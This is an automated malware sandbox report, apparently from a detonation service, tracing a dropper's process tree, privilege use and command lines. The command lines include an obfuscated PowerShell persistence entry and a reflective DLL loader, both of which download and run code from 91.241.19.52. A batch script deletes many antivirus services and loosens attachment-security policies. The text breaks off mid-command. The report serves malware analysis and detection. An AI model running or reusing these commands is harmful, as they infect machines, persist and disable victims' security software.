Setup.exegYQ2xLKgMc9lQ4OLbLxZeBiq.exeAdvancedRun.exeAdvancedRun.exepid process 1792 Setup.exe 1792 Setup.exe 4384 gYQ2xLKgMc9lQ4OLbLxZeBiq.exe 4384 gYQ2xLKgMc9lQ4OLbLxZeBiq.exe 2716 2716 2716 2716 2716 2716 3788 AdvancedRun.exe 3788 AdvancedRun.exe 2716 2716 3788 AdvancedRun.exe 3788 AdvancedRun.exe 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2344 AdvancedRun.exe 2344 AdvancedRun.exe 2344 AdvancedRun.exe 2344 AdvancedRun.exe 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2716 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
gYQ2xLKgMc9lQ4OLbLxZeBiq.exepid process 4384 gYQ2xLKgMc9lQ4OLbLxZeBiq.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
3336179.exepid process 5716 3336179.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
jfiag3g_gg.exeAdvancedRun.exenZTAvaJJHiZt8CpVom0PFy_o.exeFOlaPszW2GVODMR3ezIbHQJx.exeSapete.exe.com27kSZAfpnLjWG5bu37BpjxfH.exeAdvancedRun.exejPLO2J1s8JxaX_4Pr3O7UENC.exeXIx2rmM8cnakuvCSq1U4Vd9g.exepowershell.exeB0B4AHrsgxA7Nt6vDYP9D9LZ.exeWerFault.exepowershell.exeinstaller.exeWerFault.execmd.exe4963167.exe1063322.exe1761590.exeWerFault.exedescription pid process Token: SeDebugPrivilege 4328 jfiag3g_gg.exe Token: SeDebugPrivilege 3788 AdvancedRun.exe Token: SeImpersonatePrivilege 3788 AdvancedRun.exe Token: SeDebugPrivilege 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe Token: SeDebugPrivilege 5104 FOlaPszW2GVODMR3ezIbHQJx.exe Token: SeDebugPrivilege 2152 Sapete.exe.com Token: SeDebugPrivilege 2816 27kSZAfpnLjWG5bu37BpjxfH.exe Token: SeDebugPrivilege 2344 AdvancedRun.exe Token: SeImpersonatePrivilege 2344 AdvancedRun.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4312 Token: SeDebugPrivilege 4672 jPLO2J1s8JxaX_4Pr3O7UENC.exe Token: SeDebugPrivilege 4936 XIx2rmM8cnakuvCSq1U4Vd9g.exe Token: SeDebugPrivilege 5144 powershell.exe Token: SeDebugPrivilege 5732 B0B4AHrsgxA7Nt6vDYP9D9LZ.exe Token: SeRestorePrivilege 5800 WerFault.exe Token: SeBackupPrivilege 5800 WerFault.exe Token: SeBackupPrivilege 5800 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 5800 WerFault.exe Token: SeDebugPrivilege 5576 powershell.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 6088 installer.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4880 WerFault.exe Token: SeDebugPrivilege 352 cmd.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 2984 4963167.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 5436 1063322.exe Token: SeDebugPrivilege 5844 1761590.exe Token: SeDebugPrivilege 4144 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
DJCJOECZVtp5ltvQQsObO2H9.tmpGameBoxWin64.exeWeather Installation.exeSapete.exe.comSapete.exe.comSapete.exe.comSapete.exe.comultramediaburner.tmpMicrosoftEdgeCP.exeSapete.exe.comSapete.exe.compid process 2716 2716 4640 DJCJOECZVtp5ltvQQsObO2H9.tmp 5804 GameBoxWin64.exe 2716 2716 4684 Weather Installation.exe 5952 Sapete.exe.com 2716 2716 5952 Sapete.exe.com 5952 Sapete.exe.com 5952 Sapete.exe.com 2716 2716 4868 Sapete.exe.com 2716 2716 4868 Sapete.exe.com 4868 Sapete.exe.com 4868 Sapete.exe.com 2716 2716 2152 Sapete.exe.com 2716 2716 2152 Sapete.exe.com 2152 Sapete.exe.com 2152 Sapete.exe.com 2716 2716 6692 Sapete.exe.com 2716 2716 6692 Sapete.exe.com 6692 Sapete.exe.com 6692 Sapete.exe.com 2716 2716 5572 ultramediaburner.tmp 5156 MicrosoftEdgeCP.exe 2716 2716 5156 MicrosoftEdgeCP.exe 5156 MicrosoftEdgeCP.exe 5156 MicrosoftEdgeCP.exe 2716 2716 5424 Sapete.exe.com 2716 2716 5424 Sapete.exe.com 5424 Sapete.exe.com 5424 Sapete.exe.com 2716 2716 6464 Sapete.exe.com 2716 2716 6464 Sapete.exe.com 6464 Sapete.exe.com 6464 Sapete.exe.com 2716 2716 -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Sapete.exe.comSapete.exe.comSapete.exe.comSapete.exe.comMicrosoftEdgeCP.exeSapete.exe.comSapete.exe.comSapete.exe.comConhost.exeSapete.exe.comSapete.exe.comSapete.exe.compid process 5952 Sapete.exe.com 5952 Sapete.exe.com 5952 Sapete.exe.com 5952 Sapete.exe.com 4868 Sapete.exe.com 4868 Sapete.exe.com 4868 Sapete.exe.com 4868 Sapete.exe.com 2152 Sapete.exe.com 2152 Sapete.exe.com 2152 Sapete.exe.com 2152 Sapete.exe.com 6692 Sapete.exe.com 6692 Sapete.exe.com 6692 Sapete.exe.com 6692 Sapete.exe.com 5156 MicrosoftEdgeCP.exe 5156 MicrosoftEdgeCP.exe 5156 MicrosoftEdgeCP.exe 5156 MicrosoftEdgeCP.exe 5424 Sapete.exe.com 5424 Sapete.exe.com 5424 Sapete.exe.com 5424 Sapete.exe.com 6464 Sapete.exe.com 6464 Sapete.exe.com 6464 Sapete.exe.com 6464 Sapete.exe.com 7432 Sapete.exe.com 7432 Sapete.exe.com 7432 Sapete.exe.com 7432 Sapete.exe.com 7432 Sapete.exe.com 7504 Conhost.exe 7504 Conhost.exe 7504 Conhost.exe 7504 Conhost.exe 7504 Conhost.exe 2716 7760 Sapete.exe.com 7760 Sapete.exe.com 7760 Sapete.exe.com 7760 Sapete.exe.com 7760 Sapete.exe.com 4620 Sapete.exe.com 4620 Sapete.exe.com 4620 Sapete.exe.com 4620 Sapete.exe.com 5768 Sapete.exe.com 5768 Sapete.exe.com 5768 Sapete.exe.com 5768 Sapete.exe.com 5768 Sapete.exe.com 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exechrome.exepid process 2716 8028 MicrosoftEdge.exe 632 MicrosoftEdge.exe 2716 4448 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exe8DqmS760nYTlpJGdjx0JPYJa.exenZTAvaJJHiZt8CpVom0PFy_o.exedescription pid process target process PID 1792 wrote to memory of 4320 1792 Setup.exe uUF0atfnNdd21kTnNYUAhIyj.exe PID 1792 wrote to memory of 4320 1792 Setup.exe uUF0atfnNdd21kTnNYUAhIyj.exe PID 1792 wrote to memory of 4344 1792 Setup.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 1792 wrote to memory of 4344 1792 Setup.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 1792 wrote to memory of 4344 1792 Setup.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 1792 wrote to memory of 4336 1792 Setup.exe WnyJD1JNbEGRSLlBiKgWSQPQ.exe PID 1792 wrote to memory of 4336 1792 Setup.exe WnyJD1JNbEGRSLlBiKgWSQPQ.exe PID 1792 wrote to memory of 4336 1792 Setup.exe WnyJD1JNbEGRSLlBiKgWSQPQ.exe PID 1792 wrote to memory of 4312 1792 Setup.exe B0B4AHrsgxA7Nt6vDYP9D9LZ.exe PID 1792 wrote to memory of 4312 1792 Setup.exe B0B4AHrsgxA7Nt6vDYP9D9LZ.exe PID 1792 wrote to memory of 4312 1792 Setup.exe B0B4AHrsgxA7Nt6vDYP9D9LZ.exe PID 1792 wrote to memory of 4328 1792 Setup.exe jfiag3g_gg.exe PID 1792 wrote to memory of 4328 1792 Setup.exe jfiag3g_gg.exe PID 1792 wrote to memory of 4372 1792 Setup.exe 8DqmS760nYTlpJGdjx0JPYJa.exe PID 1792 wrote to memory of 4372 1792 Setup.exe 8DqmS760nYTlpJGdjx0JPYJa.exe PID 1792 wrote to memory of 4372 1792 Setup.exe 8DqmS760nYTlpJGdjx0JPYJa.exe PID 1792 wrote to memory of 4384 1792 Setup.exe gYQ2xLKgMc9lQ4OLbLxZeBiq.exe PID 1792 wrote to memory of 4384 1792 Setup.exe gYQ2xLKgMc9lQ4OLbLxZeBiq.exe PID 1792 wrote to memory of 4384 1792 Setup.exe gYQ2xLKgMc9lQ4OLbLxZeBiq.exe PID 1792 wrote to memory of 4396 1792 Setup.exe jQOjjWaHpikcE8hMJLCCcd7V.exe PID 1792 wrote to memory of 4396 1792 Setup.exe jQOjjWaHpikcE8hMJLCCcd7V.exe PID 1792 wrote to memory of 4396 1792 Setup.exe jQOjjWaHpikcE8hMJLCCcd7V.exe PID 4372 wrote to memory of 4940 4372 8DqmS760nYTlpJGdjx0JPYJa.exe Runtimebroker.exe PID 4372 wrote to memory of 4940 4372 8DqmS760nYTlpJGdjx0JPYJa.exe Runtimebroker.exe PID 4372 wrote to memory of 4940 4372 8DqmS760nYTlpJGdjx0JPYJa.exe Runtimebroker.exe PID 1792 wrote to memory of 5104 1792 Setup.exe FOlaPszW2GVODMR3ezIbHQJx.exe PID 1792 wrote to memory of 5104 1792 Setup.exe FOlaPszW2GVODMR3ezIbHQJx.exe PID 1792 wrote to memory of 4360 1792 Setup.exe piASTjGis5c5nGd58zBj9dtn.exe PID 1792 wrote to memory of 4360 1792 Setup.exe piASTjGis5c5nGd58zBj9dtn.exe PID 1792 wrote to memory of 4360 1792 Setup.exe piASTjGis5c5nGd58zBj9dtn.exe PID 1792 wrote to memory of 2152 1792 Setup.exe Sapete.exe.com PID 1792 wrote to memory of 2152 1792 Setup.exe Sapete.exe.com PID 1792 wrote to memory of 2816 1792 Setup.exe 27kSZAfpnLjWG5bu37BpjxfH.exe PID 1792 wrote to memory of 2816 1792 Setup.exe 27kSZAfpnLjWG5bu37BpjxfH.exe PID 1792 wrote to memory of 2200 1792 Setup.exe E6GanK2kLUrxGIsqkEGCRlzq.exe PID 1792 wrote to memory of 2200 1792 Setup.exe E6GanK2kLUrxGIsqkEGCRlzq.exe PID 1792 wrote to memory of 2200 1792 Setup.exe E6GanK2kLUrxGIsqkEGCRlzq.exe PID 4312 wrote to memory of 3788 4312 AdvancedRun.exe PID 4312 wrote to memory of 3788 4312 AdvancedRun.exe PID 4312 wrote to memory of 3788 4312 AdvancedRun.exe PID 1792 wrote to memory of 4672 1792 Setup.exe jPLO2J1s8JxaX_4Pr3O7UENC.exe PID 1792 wrote to memory of 4672 1792 Setup.exe jPLO2J1s8JxaX_4Pr3O7UENC.exe PID 1792 wrote to memory of 4672 1792 Setup.exe jPLO2J1s8JxaX_4Pr3O7UENC.exe PID 1792 wrote to memory of 4716 1792 Setup.exe 24EijN8ARjd6ySPoevmYqMMj.exe PID 1792 wrote to memory of 4716 1792 Setup.exe 24EijN8ARjd6ySPoevmYqMMj.exe PID 1792 wrote to memory of 4716 1792 Setup.exe 24EijN8ARjd6ySPoevmYqMMj.exe PID 1792 wrote to memory of 4500 1792 Setup.exe IgbKRtaNjqRQpLw8QuOXvnvo.exe PID 1792 wrote to memory of 4500 1792 Setup.exe IgbKRtaNjqRQpLw8QuOXvnvo.exe PID 1792 wrote to memory of 4500 1792 Setup.exe IgbKRtaNjqRQpLw8QuOXvnvo.exe PID 1792 wrote to memory of 4876 1792 Setup.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe PID 1792 wrote to memory of 4876 1792 Setup.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe PID 1792 wrote to memory of 4876 1792 Setup.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe PID 1792 wrote to memory of 4192 1792 Setup.exe rz4AiugRidB8wYjvgfxacrAz.exe PID 1792 wrote to memory of 4192 1792 Setup.exe rz4AiugRidB8wYjvgfxacrAz.exe PID 1792 wrote to memory of 4192 1792 Setup.exe rz4AiugRidB8wYjvgfxacrAz.exe PID 1792 wrote to memory of 4936 1792 Setup.exe XIx2rmM8cnakuvCSq1U4Vd9g.exe PID 1792 wrote to memory of 4936 1792 Setup.exe XIx2rmM8cnakuvCSq1U4Vd9g.exe PID 1792 wrote to memory of 4936 1792 Setup.exe XIx2rmM8cnakuvCSq1U4Vd9g.exe PID 4344 wrote to memory of 2676 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4344 wrote to memory of 2676 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4344 wrote to memory of 2676 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4344 wrote to memory of 2736 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4344 wrote to memory of 2736 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4344 wrote to memory of 2736 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7280 -s 4923⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8732 -s 3763⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7100 -s 4883⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8308 -s 4963⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8764 -s 5043⤵
- Program crash
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe"C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8706794550.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\8706794550.exe"C:\Users\Admin\AppData\Local\Temp\8706794550.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\8706794550.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "jQOjjWaHpikcE8hMJLCCcd7V.exe" /f & erase "C:\Users\Admin\Documents\jQOjjWaHpikcE8hMJLCCcd7V.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "jQOjjWaHpikcE8hMJLCCcd7V.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\gYQ2xLKgMc9lQ4OLbLxZeBiq.exe"C:\Users\Admin\Documents\gYQ2xLKgMc9lQ4OLbLxZeBiq.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\8DqmS760nYTlpJGdjx0JPYJa.exe"C:\Users\Admin\Documents\8DqmS760nYTlpJGdjx0JPYJa.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'4⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg 